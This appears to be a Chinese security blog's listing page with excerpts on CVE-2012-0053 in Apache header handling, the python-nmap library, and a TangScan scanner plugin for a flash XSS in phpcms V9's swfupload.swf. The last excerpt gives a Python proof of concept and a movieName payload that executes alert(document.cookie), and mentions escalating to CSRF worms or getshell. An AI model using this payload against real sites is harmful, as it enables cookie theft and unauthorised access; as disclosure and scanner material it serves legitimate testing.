5、任意请求头(不限制于Cookie)超过LimitRequestFieldSize长度,服务器都会返回400错误并显示原始错误请求头信息。

 


0x02 漏洞分析

在ap_get_mime_headers_core中,该函数对于两种错误http请求的检查返回的信息出现了问题。

1.缺陷代码如下,在检测http_header超长后会返回Bad Request并将错误的部分返回给浏览器

field[len - 1] = '\0';
apr_table_setn(r->notes, "error-notes",
apr_pstrcat(r->pool,
     "Size of a request header field "
        "exceeds server limit.<br />\n"
        "<pre>\n",
        ap_escape_html(r->pool, field),
        "</pre>\n", NULL));

2.如果检查HTTP请求头中的某个域不包含冒号,则也返回错误的部分

if (!(value = strchr(last_field, ':'))) { /* Find ':' or    */
r->status = HTTP_BAD_REQUEST;      /* abort bad request */
    apr_table_setn(r->notes, "error-notes",
     apr_pstrcat(r->pool,
      "Request header field is "
      "missing ':' separator.<br />\n"
         "<pre>\n",
         ap_escape_html(r->pool,
          last_field),
       "</pre>\n", NULL));
    return;
}

继续阅读 谈谈CVE-2012-0053

nmap from python

0x01 About


 

大家都比较熟悉nmap,nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。

今天分享一下python-nmap,是python的一个模块库,使用这个模块可以让python很方便的操作nmap扫描器来工作,它可以帮助管理员完成自动扫描任务和生成报告的工具,它还支持nmap的脚步输出。

python-nmap只提供了nmap中的端口扫描,但输出方式会让人便于信息整理。

前提:使用python-nmap你得先装有nmap该软件

Install from PIP

pip install python-nmap

2345截图20160127212007

继续阅读 nmap from python

Tangscan插件之phpcms V9 /swfupload.swf XSS

最近看到WooYun-2014-69833报告中对swfupload.swf、uploadify.swf造成的flash xss 分析,由于涉及范围广(国内各大cms厂商,包括但不限于dedecms、phpcms、cmseasy、espcms、phpyun、thinksns、骑士人才系统、phpdisk、国微php168、phpok、kesioncms、pageadmin、xheditor、sdcms、emlog、dtcms等)命中率应该还可以,便给Tangscan提交了几个此类型插件,这里也分享一下代码。

先看下漏洞成因

this.movieName = root.loaderInfo.parameters.movieName;

            this.flashReady_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].flashReady");

            this.fileDialogStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogStart");

            this.fileQueued_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueued");

            this.fileQueueError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileQueueError");

            this.fileDialogComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].fileDialogComplete");

            this.uploadStart_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadStart");

            this.uploadProgress_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadProgress");

            this.uploadError_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadError");

            this.uploadSuccess_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadSuccess");

            this.uploadComplete_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].uploadComplete");

            this.debug_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].debug");

            this.testExternalInterface_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].testExternalInterface");

            this.cleanUp_Callback = (("SWFUpload.instances[\"" + this.movieName) + "\"].cleanUp");

代码可见,从参数(root.loaderInfo.parameters.movieName)中获得movieName后直接赋值到一些callback响应函数中,这些函数是js中执行的内容。我们只需闭合前面的”],再闭合try..catch中大括号},即可执行自己的javascript代码,造成反射型XSS。

因为是flash xss,而且没有过多关键字,所以无视浏览器filter和大部分WAF(因为在前端运行),所以影响较大,轻则越权操作、产生XSS、csrf蠕虫,重则直接getshell(结合某些cms的后台getshell技巧)。

 

分享下phpcms V9 /swfupload.swf XSS POC

  • TangScan-ID:TS-2014-17843
#! /usr/bin/env python
# -*- coding: utf-8 -*-

import md5
from thirdparty import requests
from modules.exploit import TSExploit


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "phpcms V9 /swfupload.swf XSS",
            "product": "phpcmsv9",
            "product_version": "",
            "desc": """
            phpcms V9 /swfupload.swf XSS
            """,
            "license": self.license.TS,
            "author": ["侦探911"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2014-069833"},
            ],
            "type": self.type.xss,
            "severity": self.severity.low,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def md5(self, content):
        return md5.new(content).hexdigest()

    def verify(self):
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        exp_url = "{domain}/statics/js/swfupload/swfupload.swf".format(domain=self.option.url.rstrip('/'))

        try:
            response = requests.get(exp_url, verify=False, timeout=15)
        except Exception, e:
            self.result.error = str(e)
            return

        if self.md5(response.content) == flash_md5:
            self.result.status = True
            self.result.description = "目标 {url} 存在反射XSS, 验证url: {verify_url}".format(
                url=self.option.url,
                verify_url=exp_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//"
            )

    def exploit(self):
        self.verify()


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())